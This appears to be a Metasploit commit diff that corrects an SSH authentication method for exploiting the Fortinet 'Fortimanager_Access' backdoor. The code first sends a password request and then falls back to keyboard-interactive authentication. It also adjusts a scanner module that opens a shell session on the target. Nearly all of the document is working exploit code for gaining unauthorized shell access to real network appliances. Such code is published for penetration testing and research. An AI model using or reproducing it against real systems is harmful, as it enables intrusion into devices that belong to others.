Finally fix "Unknown admin user ''" after 2yrs

wvu · wvu · commit 3880f6a65e73 · 2018-02-21T20:44:35.000-06:00
The failed password auth was necessary after all. I misread the PoC. :'(

Apparently the password auth sets the username, while the backdoored
keyboard-interactive auth sets the password.
diff --git a/lib/msf/core/exploit/fortinet.rb b/lib/msf/core/exploit/fortinet.rb
@@ -1,5 +1,6 @@
 # -*- coding: binary -*-
 
+# https://www.ietf.org/rfc/rfc4252.txt
 # https://www.ietf.org/rfc/rfc4256.txt
 
 require 'net/ssh'
@@ -11,21 +12,21 @@ class Net::SSH::Authentication::Methods::FortinetBackdoor < Net::SSH::Authentica
     USERAUTH_INFO_RESPONSE = 61
 
     def authenticate(service_name, username = 'Fortimanager_Access', password = nil)
-      debug { 'Sending SSH_MSG_USERAUTH_REQUEST' }
+      debug { 'Sending SSH_MSG_USERAUTH_REQUEST (password)' }
 
       send_message(userauth_request(
 =begin
-        string    user name (ISO-10646 UTF-8, as defined in [RFC-3629])
-        string    service name (US-ASCII)
-        string    "keyboard-interactive" (US-ASCII)
-        string    language tag (as defined in [RFC-3066])
-        string    submethods (ISO-10646 UTF-8)
+        string    user name
+        string    service name
+        string    "password"
+        boolean   FALSE
+        string    plaintext password in ISO-10646 UTF-8 encoding [RFC3629]
 =end
         username,
         service_name,
-        'keyboard-interactive',
-        '',
-        ''
+        'password',
+        false,
+        password || ''
       ))
 
       loop do
@@ -37,7 +38,22 @@ def authenticate(service_name, username = 'Fortimanager_Access', password = nil)
           return true
         when USERAUTH_FAILURE
           debug { 'Received SSH_MSG_USERAUTH_FAILURE' }
-          return false
+          debug { 'Sending SSH_MSG_USERAUTH_REQUEST (keyboard-interactive)' }
+
+          send_message(userauth_request(
+=begin
+            string    user name (ISO-10646 UTF-8, as defined in [RFC-3629])
+            string    service name (US-ASCII)
+            string    "keyboard-interactive" (US-ASCII)
+            string    language tag (as defined in [RFC-3066])
+            string    submethods (ISO-10646 UTF-8)
+=end
+            username,
+            service_name,
+            'keyboard-interactive',
+            '',
+            ''
+          ))
         when USERAUTH_INFO_REQUEST
           debug { 'Received SSH_MSG_USERAUTH_INFO_REQUEST' }
 
diff --git a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb
@@ -93,6 +93,9 @@ def run_host(ip)
     }
 
     start_session(self, info, ds_merge, false, shell.lsock)
+
+    # XXX: Ruby segfaults if we don't remove the SSH socket
+    remove_socket(ssh.transport.socket)
   end
 
   def rport

Original file line number	Diff line number	Diff line change
`@@ -93,6 +93,9 @@ def run_host(ip)`
`93`	`93`	`}`
`94`	`94`
`95`	`95`	`start_session(self, info, ds_merge, false, shell.lsock)`
	`96`	`+`
	`97`	`+ # XXX: Ruby segfaults if we don't remove the SSH socket`
	`98`	`+ remove_socket(ssh.transport.socket)`
`96`	`99`	`end`
`97`	`100`
`98`	`101`	`def rport`